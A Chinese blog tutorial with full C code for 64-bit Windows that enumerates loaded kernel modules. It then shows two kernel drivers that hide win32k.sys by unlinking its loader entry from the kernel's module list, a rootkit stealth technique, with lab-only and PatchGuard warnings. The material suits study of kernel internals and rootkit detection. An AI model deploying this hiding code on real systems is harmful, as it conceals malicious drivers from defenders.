这篇文章仍然是根据作者 Tesla.Angela 开源的教程写的, 感谢作者无私奉献的精神。
先说枚举。枚举是在应用层实现的, 这里的精髓在于找到了 WIN64 上 SYSTEM_MODULE_INFORMATION 正确的结构体定义: 如果这个结构定义不对, 后面的字段全部错位, 程序肯定是不对的。
然后用的是 ZwQuerySystemInformation 的第 11 号信息类 (SystemModuleInformation) 来查询模块信息。注意: 较新的 Windows 版本会对非管理员进程限制这类查询或隐藏其中的内核地址, 实验时建议以管理员权限运行。
直接看代码吧, 这段代码是根据作者开源的代码所写。
#include <stdio.h>
#include <stdlib.h>   /* malloc/free: the original omitted this, leaving malloc implicitly declared */
#include <string.h>   /* _stricmp */
#include <Windows.h>
/*
 * Prototype of ntdll!ZwQuerySystemInformation, which <Windows.h> does not
 * declare; main() resolves the export at runtime into the global below.
 * NOTE(review): the original omits NTAPI (__stdcall). That is harmless on x64,
 * the only target this post claims, but a 32-bit build would need it.
 */
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)
(
IN ULONG SystemInformationClass,   /* 11 = SystemModuleInformation, see Find() */
OUT PVOID SystemInformation,       /* caller-supplied output buffer */
IN ULONG Length,                   /* size of that buffer in bytes */
OUT PULONG ReturnLength            /* size reported back by the kernel (unused here) */
);
/* Redundant: <Windows.h> already defines DWORD identically; kept as in the original. */
typedef unsigned long DWORD;
/*
 * One record of the SystemModuleInformation (class 11) result, x64 layout.
 * This struct is not in a public SDK header; as the post stresses, getting the
 * layout right is the whole trick — a wrong field size shifts every later field.
 * Only Base, ModuleNameOffset and ImageName are read by this program.
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;   /* Unknow1..4: 16 bytes in front of Base (two pointer-sized fields on x64) */
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;      /* image base; kernel images are filtered by comparing this against 0x8000000000000000 */
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;   /* index into ImageName where the bare file name starts */
char ImageName[256];       /* path of the image; file name is at ImageName + ModuleNameOffset */
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
/*
 * Header of the SystemModuleInformation buffer: Count followed by a
 * variable-length array of entries (declared as [1], indexed up to Count-1).
 * On x64 the PVOID inside the entry aligns Module[] to offset 8, not 4.
 */
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;   /* number of valid entries in Module[] */
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/* Resolved in main() from ntdll.dll; NULL until then, so Find() must only run after main() sets it. */
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
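/*
 * Enumerate loaded kernel modules via ZwQuerySystemInformation(SystemModuleInformation)
 * and print each one, marking the entry whose file name equals FindName
 * (case-insensitive). Only entries whose base lies in kernel space are printed.
 *
 * FindName: bare file name to look for, e.g. "win32k.sys".
 * Requires the global ZwQuerySystemInformation pointer to be resolved (see main()).
 *
 * Fixes vs. the original: the query buffer is now freed on every path (it was
 * never freed after a successful query), Count is bounded by the buffer size,
 * and ModuleNameOffset is range-checked before it is used as an index.
 */
VOID Find(char* FindName)
{
    /* Not provided by <Windows.h>; value is STATUS_INFO_LENGTH_MISMATCH from ntstatus.h. */
    const NTSTATUS kStatusInfoLengthMismatch = (NTSTATUS)0xC0000004L;
    enum { kSystemModuleInformation = 11 };
    enum { kInitialBufferSize = 0x5000 };

    BOOL found = 0;
    ULONG needSize = 0;
    ULONG bufferSize = kInitialBufferSize;
    PVOID buffer = NULL;
    NTSTATUS status;
    PSYSTEM_MODULE_INFORMATION info;
    ULONG headerSize, maxEntries, moduleCount, i;

    if (FindName == NULL || ZwQuerySystemInformation == NULL)
        return;

    /* Grow the buffer until the kernel stops reporting a length mismatch. */
    for (;;)
    {
        buffer = malloc(bufferSize);
        if (buffer == NULL)
            return;
        status = ZwQuerySystemInformation(kSystemModuleInformation, buffer, bufferSize, &needSize);
        if (status != kStatusInfoLengthMismatch)
            break;
        free(buffer);
        buffer = NULL;
        if (bufferSize > 0x7FFFFFFFu)   /* doubling would wrap the ULONG */
            return;
        bufferSize *= 2;
    }
    if (status < 0)
    {
        /* Query failed: nothing to enumerate. */
        free(buffer);
        return;
    }

    info = (PSYSTEM_MODULE_INFORMATION)buffer;
    moduleCount = info->Count;
    /* Bound Count by what the buffer can hold, so a wrong struct layout cannot walk past it. */
    headerSize = (ULONG)((char *)&info->Module[0] - (char *)info);
    maxEntries = (bufferSize - headerSize) / (ULONG)sizeof(info->Module[0]);
    if (moduleCount > maxEntries)
    {
        free(buffer);
        return;
    }

    for (i = 0; i < moduleCount; i++)
    {
        PSYSTEM_MODULE_INFORMATION_ENTRY entry = &info->Module[i];
        const char *name;

        /* Same filter as the original: only bases above 0x8000000000000000 (kernel space on x64). */
        if ((ULONG64)entry->Base <= (ULONG64)0x8000000000000000ULL)
            continue;
        /* ModuleNameOffset indexes into ImageName; bound it and force termination. */
        if (entry->ModuleNameOffset >= sizeof(entry->ImageName))
            continue;
        entry->ImageName[sizeof(entry->ImageName) - 1] = '\0';
        name = entry->ImageName + entry->ModuleNameOffset;

        printf("0x%llx\t%s", (unsigned long long)(ULONG64)entry->Base, name);
        if (_stricmp(name, FindName) == 0)
        {
            printf("\t\t<--------------------");
            found = 1;
        }
        printf("\n");
    }
    free(buffer);

    if (found)
    {
        printf("寻找到了指定内核模块!\n");
    }
    else
    {
        printf("很遗憾 没有找到!\n");
    }
}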
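/*
 * Entry point: resolve ZwQuerySystemInformation from ntdll and enumerate
 * kernel modules, highlighting win32k.sys. Returns 1 if the export cannot be
 * resolved (the original called through an unchecked, possibly NULL pointer).
 */
int main(void)
{
    /* ntdll is mapped into every process, so GetModuleHandle suffices — no LoadLibrary refcount to leak. */
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    if (ntdll == NULL)
    {
        printf("GetModuleHandleW(ntdll.dll) failed: %lu\n", GetLastError());
        return 1;
    }
    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(ntdll, "ZwQuerySystemInformation");
    if (ZwQuerySystemInformation == NULL)
    {
        printf("GetProcAddress(ZwQuerySystemInformation) failed: %lu\n", GetLastError());
        return 1;
    }
    Find("win32k.sys");
    getchar();   /* keep the console open until a key is pressed */
    return 0;
}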
在 Windows 10 (x64) 上运行正常。注意代码用 ULONG64 和 0x8000000000000000 来过滤内核地址, 只适用于 64 位。
然后下面就是隐藏了。
隐藏就是上一篇博客说的断链: 把目标模块的 KLDR_DATA_TABLE_ENTRY 从加载模块链表 (InLoadOrderLinks) 中摘掉。
这里其实有两种方法: 一种是先用 GetSystemModuleBase 拿到模块基址再按 DllBase 匹配, 另一种是直接用 RtlEqualUnicodeString 按 BaseDllName 匹配。下面是参考作者写出的代码。提醒: 断链只是改了链表指针, 模块本身仍在内存中; 并且据公开资料, 64 位 Windows 的 PatchGuard 会校验这类内核链表, 断链可能导致 0x109 蓝屏, 只适合在测试机上实验。
#include<ntddk.h>
#include <Ntddkbd.h>
/*
 * Hand-written prototype for the ntoskrnl export ZwQuerySystemInformation,
 * which the headers included above do not declare. Only class 11
 * (SystemModuleInformation) is used by this driver. Call at PASSIVE_LEVEL.
 */
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation
(
IN ULONG SystemInformationClass,   /* 11 = SystemModuleInformation */
OUT PVOID SystemInformation,       /* caller-supplied output buffer */
IN ULONG Length,                   /* size of that buffer in bytes */
OUT PULONG ReturnLength            /* size reported back by the kernel */
);
/*
 * One record of the SystemModuleInformation (class 11) result, x64 layout —
 * identical to the user-mode enumerator's definition. Not from a public header;
 * a wrong field size shifts every later field. Only Base, ModuleNameOffset and
 * ImageName are read by this driver.
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;   /* Unknow1..4: 16 bytes in front of Base (two pointer-sized fields on x64) */
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;      /* image base; compared against the KLDR entry's DllBase in HideDriver() */
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;   /* index into ImageName where the bare file name starts */
char ImageName[256];       /* path of the image; file name is at ImageName + ModuleNameOffset */
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
/*
 * Header of the SystemModuleInformation buffer: Count followed by a
 * variable-length array of entries (declared as [1], indexed up to Count-1).
 * On x64 the PVOID inside the entry aligns Module[] to offset 8.
 */
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;   /* number of loaded-module entries that follow */
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/*
 * Partial, 64-bit-only mirror of the kernel loader entry that
 * DRIVER_OBJECT.DriverSection points at. This driver reads only
 * InLoadOrderLinks, DllBase, BaseDllName and FullDllName; the __Undefined*
 * and __padding* members exist purely to keep those at the right offsets.
 * NOTE(review): the layout is not from a public header and can change between
 * Windows builds — confirm the offsets on the target build (e.g. with
 * `dt nt!_KLDR_DATA_TABLE_ENTRY` in WinDbg) before relying on them.
 * Identifiers starting with "__" are reserved in C; kept unchanged here.
 */
typedef struct _KLDR_DATA_TABLE_ENTRY
{
LIST_ENTRY64 InLoadOrderLinks;   /* links of the circular loaded-module list; Flink/Blink are ULONG64, cast to pointers on x64 */
ULONG64 __Undefined1;
ULONG64 __Undefined2;
ULONG64 __Undefined3;
ULONG64 NonPagedDebugInfo;
ULONG64 DllBase;                 /* image base; matched against GetSystemModuleBase() */
ULONG64 EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;      /* full path, printed with %wZ */
UNICODE_STRING BaseDllName;      /* file name, e.g. L"win32k.sys" */
ULONG Flags;
USHORT LoadCount;
USHORT __Undefined5;
ULONG64 __Undefined6;
ULONG CheckSum;
ULONG __padding1;
ULONG TimeDateStamp;
ULONG __padding2;
}KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
/* Set in DriverEntry(); HideDriver() reads DriverSection through it to reach the loaded-module list. */
PDRIVER_OBJECT DriverObject = NULL;
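/*
 * Resolve the image base of a loaded kernel module by file name
 * (case-insensitive) using ZwQuerySystemInformation(SystemModuleInformation).
 *
 * lpModuleName: bare file name such as "win32k.sys".
 * Returns the module's base address, or 0 when the module is not loaded,
 * the query fails or the name is NULL.
 * Must run at PASSIVE_LEVEL: it allocates pool and calls a Zw* service.
 *
 * Fixes vs. the original: the pool buffer is released on the found path too
 * (it was leaked there), allocations are tagged, Count is bounded by the
 * buffer size and ModuleNameOffset is range-checked before use.
 */
ULONG64 GetSystemModuleBase(char* lpModuleName)
{
    enum { kSystemModuleInformation = 11 };
    enum { kInitialBufferSize = 0x5000 };
    const ULONG kPoolTag = 'ldoM';          /* reads "Modl" in pool dumps */
    ULONG bufferSize = kInitialBufferSize;
    ULONG needSize = 0;
    PVOID buffer = NULL;
    NTSTATUS status;
    ULONG64 base = 0;
    PSYSTEM_MODULE_INFORMATION info;
    ULONG headerSize, maxEntries, i;

    if (lpModuleName == NULL)
        return 0;

    /* Grow the buffer until the kernel stops reporting a length mismatch. */
    for (;;)
    {
        buffer = ExAllocatePoolWithTag(NonPagedPool, bufferSize, kPoolTag);
        if (buffer == NULL)
            return 0;
        status = ZwQuerySystemInformation(kSystemModuleInformation, buffer, bufferSize, &needSize);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
            break;
        ExFreePoolWithTag(buffer, kPoolTag);
        buffer = NULL;
        if (bufferSize > 0x7FFFFFFFu)   /* doubling would wrap the ULONG */
            return 0;
        bufferSize *= 2;
    }
    if (!NT_SUCCESS(status))
        goto done;

    info = (PSYSTEM_MODULE_INFORMATION)buffer;
    /* Bound Count by what the buffer can hold, so a wrong struct layout cannot walk past it. */
    headerSize = (ULONG)((char *)&info->Module[0] - (char *)info);
    maxEntries = (bufferSize - headerSize) / (ULONG)sizeof(info->Module[0]);
    if (info->Count > maxEntries)
        goto done;

    for (i = 0; i < info->Count; i++)
    {
        PSYSTEM_MODULE_INFORMATION_ENTRY entry = &info->Module[i];
        char *name;

        /* Same filter as the original: only bases above 0x8000000000000000 (kernel space on x64). */
        if ((ULONG64)entry->Base <= (ULONG64)0x8000000000000000ULL)
            continue;
        /* ModuleNameOffset indexes into ImageName; bound it and force termination. */
        if (entry->ModuleNameOffset >= sizeof(entry->ImageName))
            continue;
        entry->ImageName[sizeof(entry->ImageName) - 1] = '\0';
        name = entry->ImageName + entry->ModuleNameOffset;

        if (_stricmp(name, lpModuleName) == 0)
        {
            base = (ULONG64)entry->Base;
            break;
        }
    }

done:
    /* Single release point for every outcome. */
    ExFreePoolWithTag(buffer, kPoolTag);
    return base;
}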
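/*
 * Unlink the loader entry of module pDrvName from the in-load-order list that
 * this driver's own DriverSection is part of (the kernel's loaded-module list),
 * so walkers of that list no longer see it.
 *
 * pDrvName: file name of the module to hide; resolved to a base address with
 *           GetSystemModuleBase() and matched against each entry's DllBase.
 *
 * Fixes vs. the original:
 *  - bails out when the module is not found (otherwise a base of 0 could match
 *    a stale or garbage entry and unlink it);
 *  - walks the whole circular list (the old loop skipped the entry whose Flink
 *    points back at the start);
 *  - the unlinked entry's links point at itself instead of 0, so a later
 *    RemoveEntryList() on it (module unload) is a no-op, not a NULL dereference;
 *  - %wZ is given pointers to the UNICODE_STRINGs, not the structs by value.
 *
 * Caveats (review): raising to DPC_LEVEL only stops preemption on this CPU; it
 * is not the lock the kernel uses for this list, so a concurrent load/unload on
 * another CPU can still race with the unlink. The circular list also includes
 * the kernel's list head, which is only a LIST_ENTRY and not a full entry, so
 * reading its DllBase/name fields reads past it — the Buffer check below is a
 * best-effort guard, not a proof. Lab-only technique: 64-bit kernel integrity
 * checks are reported to flag this kind of list tampering.
 */
VOID HideDriver(char *pDrvName)
{
    PKLDR_DATA_TABLE_ENTRY first, entry;
    ULONG64 targetBase;
    KIRQL oldIrql;

    if (DriverObject == NULL || DriverObject->DriverSection == NULL || pDrvName == NULL)
        return;

    targetBase = GetSystemModuleBase(pDrvName);
    if (targetBase == 0)
    {
        DbgPrint("HideDriver: module %s not found\n", pDrvName);
        return;
    }

    first = (PKLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
    entry = first;
    do
    {
        PKLDR_DATA_TABLE_ENTRY next = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
        if (next == NULL)
            break;   /* defensive: an entry that was already unlinked */

        if (entry->DllBase == targetBase)
        {
            LIST_ENTRY64 *flink = (LIST_ENTRY64 *)entry->InLoadOrderLinks.Flink;
            LIST_ENTRY64 *blink = (LIST_ENTRY64 *)entry->InLoadOrderLinks.Blink;

            oldIrql = KeRaiseIrqlToDpcLevel();
            flink->Blink = entry->InLoadOrderLinks.Blink;
            blink->Flink = entry->InLoadOrderLinks.Flink;
            /* Self-link so RemoveEntryList() on this entry stays harmless. */
            entry->InLoadOrderLinks.Flink = (ULONG64)&entry->InLoadOrderLinks;
            entry->InLoadOrderLinks.Blink = (ULONG64)&entry->InLoadOrderLinks;
            KeLowerIrql(oldIrql);

            DbgPrint("Remove LIST_ENTRY64 OK!");
            return;
        }

        if (entry->BaseDllName.Buffer != NULL)
            DbgPrint("%llx\t%wZ\t%wZ", entry->DllBase, &entry->BaseDllName, &entry->FullDllName);
        entry = next;
    } while (entry != first);
}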
/*
 * DriverUnload callback: only traces the unload.
 * NOTE(review): the unlink performed by HideDriver() is not undone here, so
 * the hidden entry stays out of the list after this driver is gone.
 */
VOID Unload(PDRIVER_OBJECT pDriverObject)
{
    (void)pDriverObject;   /* unused */
    KdPrint(("开始卸载!\n"));
}
/*
 * Driver entry: remember the driver object (HideDriver() walks the module list
 * from its DriverSection), register the unload routine and hide win32k.sys.
 * Always returns STATUS_SUCCESS, whether or not the hide succeeded.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    (void)pRegPath;   /* registry path is not needed */
    DriverObject = pDriverObject;
    pDriverObject->DriverUnload = Unload;
    HideDriver("win32k.sys");
    return STATUS_SUCCESS;
}
#include<ntddk.h>
#include <Ntddkbd.h>
/*
 * Hand-written prototype for the ntoskrnl export ZwQuerySystemInformation,
 * which the headers included above do not declare. Only class 11
 * (SystemModuleInformation) is used by this driver. Call at PASSIVE_LEVEL.
 */
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation
(
IN ULONG SystemInformationClass,   /* 11 = SystemModuleInformation */
OUT PVOID SystemInformation,       /* caller-supplied output buffer */
IN ULONG Length,                   /* size of that buffer in bytes */
OUT PULONG ReturnLength            /* size reported back by the kernel */
);
/*
 * One record of the SystemModuleInformation (class 11) result, x64 layout —
 * identical to the definition in the other two listings. Not from a public
 * header; a wrong field size shifts every later field. Only Base,
 * ModuleNameOffset and ImageName are read by GetSystemModuleBase().
 */
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
{
ULONG Unknow1;   /* Unknow1..4: 16 bytes in front of Base (two pointer-sized fields on x64) */
ULONG Unknow2;
ULONG Unknow3;
ULONG Unknow4;
PVOID Base;      /* image base */
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT ModuleNameOffset;   /* index into ImageName where the bare file name starts */
char ImageName[256];       /* path of the image; file name is at ImageName + ModuleNameOffset */
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
/*
 * Header of the SystemModuleInformation buffer: Count followed by a
 * variable-length array of entries (declared as [1], indexed up to Count-1).
 * On x64 the PVOID inside the entry aligns Module[] to offset 8.
 */
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;   /* number of loaded-module entries that follow */
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
/*
 * Partial, 64-bit-only mirror of the kernel loader entry that
 * DRIVER_OBJECT.DriverSection points at. This listing reads only
 * InLoadOrderLinks, DllBase, BaseDllName and FullDllName; the __Undefined*
 * and __padding* members exist purely to keep those at the right offsets.
 * NOTE(review): the layout is not from a public header and can change between
 * Windows builds — confirm the offsets on the target build (e.g. with
 * `dt nt!_KLDR_DATA_TABLE_ENTRY` in WinDbg) before relying on them.
 * Identifiers starting with "__" are reserved in C; kept unchanged here.
 */
typedef struct _KLDR_DATA_TABLE_ENTRY
{
LIST_ENTRY64 InLoadOrderLinks;   /* links of the circular loaded-module list; Flink/Blink are ULONG64, cast to pointers on x64 */
ULONG64 __Undefined1;
ULONG64 __Undefined2;
ULONG64 __Undefined3;
ULONG64 NonPagedDebugInfo;
ULONG64 DllBase;                 /* image base, printed in the walk */
ULONG64 EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;      /* full path, printed with %wZ */
UNICODE_STRING BaseDllName;      /* file name; compared with uString in HideDriver() */
ULONG Flags;
USHORT LoadCount;
USHORT __Undefined5;
ULONG64 __Undefined6;
ULONG CheckSum;
ULONG __padding1;
ULONG TimeDateStamp;
ULONG __padding2;
}KLDR_DATA_TABLE_ENTRY, *PKLDR_DATA_TABLE_ENTRY;
/* Set in DriverEntry(); HideDriver() reads DriverSection through it to reach the loaded-module list. */
PDRIVER_OBJECT DriverObject = NULL;
/* Name of the module to hide (L"win32k.sys"), initialised in DriverEntry() before HideDriver() runs. */
UNICODE_STRING uString;
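/*
 * Resolve the image base of a loaded kernel module by file name
 * (case-insensitive) using ZwQuerySystemInformation(SystemModuleInformation).
 * Not called by this listing's HideDriver(), which matches by name instead,
 * but kept with the same contract as in the previous listing.
 *
 * lpModuleName: bare file name such as "win32k.sys".
 * Returns the module's base address, or 0 when the module is not loaded,
 * the query fails or the name is NULL.
 * Must run at PASSIVE_LEVEL: it allocates pool and calls a Zw* service.
 *
 * Fixes vs. the original: the pool buffer is released on the found path too
 * (it was leaked there), allocations are tagged, Count is bounded by the
 * buffer size and ModuleNameOffset is range-checked before use.
 */
ULONG64 GetSystemModuleBase(char* lpModuleName)
{
    enum { kSystemModuleInformation = 11 };
    enum { kInitialBufferSize = 0x5000 };
    const ULONG kPoolTag = 'ldoM';          /* reads "Modl" in pool dumps */
    ULONG bufferSize = kInitialBufferSize;
    ULONG needSize = 0;
    PVOID buffer = NULL;
    NTSTATUS status;
    ULONG64 base = 0;
    PSYSTEM_MODULE_INFORMATION info;
    ULONG headerSize, maxEntries, i;

    if (lpModuleName == NULL)
        return 0;

    /* Grow the buffer until the kernel stops reporting a length mismatch. */
    for (;;)
    {
        buffer = ExAllocatePoolWithTag(NonPagedPool, bufferSize, kPoolTag);
        if (buffer == NULL)
            return 0;
        status = ZwQuerySystemInformation(kSystemModuleInformation, buffer, bufferSize, &needSize);
        if (status != STATUS_INFO_LENGTH_MISMATCH)
            break;
        ExFreePoolWithTag(buffer, kPoolTag);
        buffer = NULL;
        if (bufferSize > 0x7FFFFFFFu)   /* doubling would wrap the ULONG */
            return 0;
        bufferSize *= 2;
    }
    if (!NT_SUCCESS(status))
        goto done;

    info = (PSYSTEM_MODULE_INFORMATION)buffer;
    /* Bound Count by what the buffer can hold, so a wrong struct layout cannot walk past it. */
    headerSize = (ULONG)((char *)&info->Module[0] - (char *)info);
    maxEntries = (bufferSize - headerSize) / (ULONG)sizeof(info->Module[0]);
    if (info->Count > maxEntries)
        goto done;

    for (i = 0; i < info->Count; i++)
    {
        PSYSTEM_MODULE_INFORMATION_ENTRY entry = &info->Module[i];
        char *name;

        /* Same filter as the original: only bases above 0x8000000000000000 (kernel space on x64). */
        if ((ULONG64)entry->Base <= (ULONG64)0x8000000000000000ULL)
            continue;
        /* ModuleNameOffset indexes into ImageName; bound it and force termination. */
        if (entry->ModuleNameOffset >= sizeof(entry->ImageName))
            continue;
        entry->ImageName[sizeof(entry->ImageName) - 1] = '\0';
        name = entry->ImageName + entry->ModuleNameOffset;

        if (_stricmp(name, lpModuleName) == 0)
        {
            base = (ULONG64)entry->Base;
            break;
        }
    }

done:
    /* Single release point for every outcome. */
    ExFreePoolWithTag(buffer, kPoolTag);
    return base;
}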
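/*
 * Unlink the loader entry whose BaseDllName equals the global uString
 * (case-insensitive) from the in-load-order list that this driver's own
 * DriverSection is part of (the kernel's loaded-module list).
 *
 * Fixes vs. the original:
 *  - returns early if uString was never initialised;
 *  - walks the whole circular list (the old loop skipped the entry whose Flink
 *    points back at the start);
 *  - the unlinked entry's links point at itself instead of 0, so a later
 *    RemoveEntryList() on it (module unload) is a no-op, not a NULL dereference;
 *  - %wZ is given pointers to the UNICODE_STRINGs, not the structs by value;
 *  - the unused pDrvBase local and dead commented-out code are gone.
 *
 * Caveats (review): raising to DPC_LEVEL only stops preemption on this CPU; it
 * is not the lock the kernel uses for this list, so a concurrent load/unload on
 * another CPU can still race with the unlink. The circular list also includes
 * the kernel's list head, which is only a LIST_ENTRY and not a full entry, so
 * its BaseDllName field is not real data — the Buffer check below is a
 * best-effort guard before comparing or printing. Lab-only technique: 64-bit
 * kernel integrity checks are reported to flag this kind of list tampering.
 */
VOID HideDriver(void)
{
    PKLDR_DATA_TABLE_ENTRY first, entry;
    KIRQL oldIrql;

    if (DriverObject == NULL || DriverObject->DriverSection == NULL || uString.Buffer == NULL)
        return;

    first = (PKLDR_DATA_TABLE_ENTRY)DriverObject->DriverSection;
    entry = first;
    do
    {
        PKLDR_DATA_TABLE_ENTRY next = (PKLDR_DATA_TABLE_ENTRY)entry->InLoadOrderLinks.Flink;
        BOOLEAN hasName;

        if (next == NULL)
            break;   /* defensive: an entry that was already unlinked */

        hasName = (entry->BaseDllName.Buffer != NULL);
        if (hasName && RtlEqualUnicodeString(&entry->BaseDllName, &uString, TRUE))
        {
            LIST_ENTRY64 *flink = (LIST_ENTRY64 *)entry->InLoadOrderLinks.Flink;
            LIST_ENTRY64 *blink = (LIST_ENTRY64 *)entry->InLoadOrderLinks.Blink;

            oldIrql = KeRaiseIrqlToDpcLevel();
            flink->Blink = entry->InLoadOrderLinks.Blink;
            blink->Flink = entry->InLoadOrderLinks.Flink;
            /* Self-link so RemoveEntryList() on this entry stays harmless. */
            entry->InLoadOrderLinks.Flink = (ULONG64)&entry->InLoadOrderLinks;
            entry->InLoadOrderLinks.Blink = (ULONG64)&entry->InLoadOrderLinks;
            KeLowerIrql(oldIrql);

            DbgPrint("Remove LIST_ENTRY64 OK!");
            return;
        }

        if (hasName)
            DbgPrint("%llx\t%wZ\t%wZ", entry->DllBase, &entry->BaseDllName, &entry->FullDllName);
        entry = next;
    } while (entry != first);
}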
/*
 * DriverUnload callback: only traces the unload.
 * NOTE(review): the unlink performed by HideDriver() is not undone here, so
 * the hidden entry stays out of the list after this driver is gone.
 */
VOID Unload(PDRIVER_OBJECT pDriverObject)
{
    (void)pDriverObject;   /* unused */
    KdPrint(("开始卸载!\n"));
}
/*
 * Driver entry: remember the driver object (HideDriver() walks the module list
 * from its DriverSection), register the unload routine, set the name to hide
 * and unlink it. Always returns STATUS_SUCCESS, whether or not the hide succeeded.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegPath)
{
    (void)pRegPath;   /* registry path is not needed */
    DriverObject = pDriverObject;
    pDriverObject->DriverUnload = Unload;
    /* Must precede HideDriver(): it compares each entry's BaseDllName against uString. */
    RtlInitUnicodeString(&uString, L"win32k.sys");
    HideDriver();
    return STATUS_SUCCESS;
}